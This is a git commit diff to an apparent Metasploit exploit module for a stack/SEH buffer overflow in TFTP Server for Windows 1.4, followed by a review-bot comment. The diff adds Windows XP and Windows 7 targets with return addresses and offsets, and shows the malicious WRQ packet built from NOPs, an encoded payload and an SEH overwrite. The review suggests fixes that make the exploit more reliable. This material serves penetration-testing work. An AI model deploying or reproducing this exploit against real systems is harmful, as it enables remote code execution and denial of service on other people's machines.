Implemented Changes suggested by wchen-r7 (sinn3r)
parent
feb625cab0
commit
47ecd36805
|
@ -21,7 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
|
||||
|
||||
'Description' => %q{ TFTP Server for Windows V1.4 ST WRQ request packet exploit Coded by Mati Aharoni
|
||||
muts..at..offensive-security.com SEH Exploit
|
||||
muts..at..offensive-security.com
|
||||
The vulnerability occurs due to the way TFTP handles the filename parameter extracted from a WRQ request.
|
||||
The server will append the user-supplied filename to TFTP server binary's path without any bounds checking,
|
||||
and then attempt to open this with a fopen(). Since this isn't a valid file path, fopen() returns null,
|
||||
which allows the corrupted data to be used in a strcmp() function, causing an access violation.
|
||||
|
||||
Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine
|
||||
launched the TFTP as a 'Service' or 'Standalone', and then manually select your target accordingly.
|
||||
A successful attempt will lead to remote code execution; a failed attempt may result a denial-of-service.
|
||||
ported to metasploit by Datacut},
|
||||
|
||||
'Author' =>
|
||||
|
@ -73,16 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1. possible may work for other service packs and or vista
|
||||
|
||||
[ 'Windows XP SP2/SP3 EN', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x64', { 'Ret' => 0x416801 , 'Offset' => 1217} ] # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x86', { 'Ret' => 0x416801 , 'Offset' => 1223} ] # pop pop ret tftpserversp.exe
|
||||
[ 'Windows XP SP2/SP3 EN Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x64 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x86 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x86 Standalone Mose', { 'Ret' => 0x416801 , 'Offset' => 1507} ] # pop pop ret tftpserversp.exe
|
||||
],
|
||||
|
||||
'Privileged' => false,
|
||||
|
||||
'DisclosureDate'=> 'Mar 26 2008',
|
||||
|
||||
'DefaultTarget' => 2))
|
||||
'DefaultTarget' => 5))
|
||||
|
||||
|
||||
register_options(
|
||||
|
@ -107,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
|
||||
mode = "netascii"
|
||||
|
||||
sploit = "\x00\x02" + evil + "\0" + mode +"\0"
|
||||
sploit = "\x00\x02" + evil + "\0" + mode +"\0" #Send the WRQ packet (header "\x00\x02")
|
||||
|
||||
udp_sock.put(sploit)
|
||||
|
||||
|
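Review bot: The new target table is inconsistent with the description it is meant to implement: the last entry is misspelled "Standalone Mose" and the table says "Server Mode" while the description text tells the operator to pick between 'Service' and 'Standalone', so an operator matching the description to the target list will not find a 'Service' target; the final line should read `[ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ] # pop pop ret tftpserversp.exe` and the three "Server Mode" names should use the same word as the description (and the matching description sentence should say "may result in a denial-of-service"). `'Privileged' => false` is kept unchanged, but the "Server/Service Mode" targets by their own naming exploit the process when it runs as a Windows service, which is typically LocalSystem; if that is the case here the module should set `'Privileged' => true` for accuracy, or the description should note the privilege level obtained differs between the two modes — confirm against the service's logon account. All six targets reuse the single `0x416801` pop/pop/ret from tftpserversp.exe, so a one-sentence comment stating that the binary is assumed to lack ASLR/DEP opt-in on the Windows 7 targets would help the next maintainer understand why the same address is expected to hold; this is an inference from the table, not something the hunk states. The enclosing `initialize` call starts before the first hunk and its argument list continues past this one.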